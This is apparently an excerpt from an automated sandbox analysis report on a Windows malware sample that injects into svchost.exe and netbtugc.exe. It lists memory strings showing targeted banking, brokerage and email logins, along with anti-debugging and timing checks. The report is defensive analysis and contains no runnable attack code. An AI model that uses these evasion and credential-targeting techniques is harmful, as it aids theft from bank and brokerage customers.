Source: 01194HH4.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11
Source: 01194HH4.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 01194HH4.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 01194HH4.5.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 01194HH4.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 01194HH4.5.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,1169648
Source: 01194HH4.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 01194HH4.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 01194HH4.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7096E rdtsc 2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004172B3 LdrLoadDll, 2_2_004172B3
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_040D4498 mov eax, dword ptr fs:[00000030h] 0_2_040D4498
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_040D44F8 mov eax, dword ptr fs:[00000030h] 0_2_040D44F8
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_040D2E78 mov eax, dword ptr fs:[00000030h] 0_2_040D2E78
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] 2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] 2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] 2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] 2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] 2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] 2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] 2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] 2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] 2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h] 2_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] 2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] 2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] 2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] 2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] 2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] 2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] 2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] 2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h] 2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] 2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] 2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] 2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] 2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] 2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h] 2_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h] 2_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] 2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] 2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h] 2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h] 2_2_03B0634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h] 2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h] 2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] 2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] 2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] 2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] 2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] 2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] 2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h] 2_2_03B062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h] 2_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] 2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] 2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] 2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h] 2_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h] 2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h] 2_2_03B0625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h] 2_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h] 2_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h] 2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h] 2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h] 2_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h] 2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h] 2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h] 2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h] 2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] 2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] 2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] 2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] 2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] 2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] 2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] 2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h] 2_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h] 2_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h] 2_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] 2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h] 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h] 2_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h] 2_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h] 2_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] 2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] 2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h] 2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] 2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] 2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h] 2_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h] 2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h] 2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h] 2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h] 2_2_03A280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h] 2_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h] 2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h] 2_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h] 2_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h] 2_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h] 2_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h] 2_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h] 2_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h] 2_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h] 2_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h] 2_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] 2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] 2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] 2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] 2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h] 2_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h] 2_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h] 2_2_03AB6050
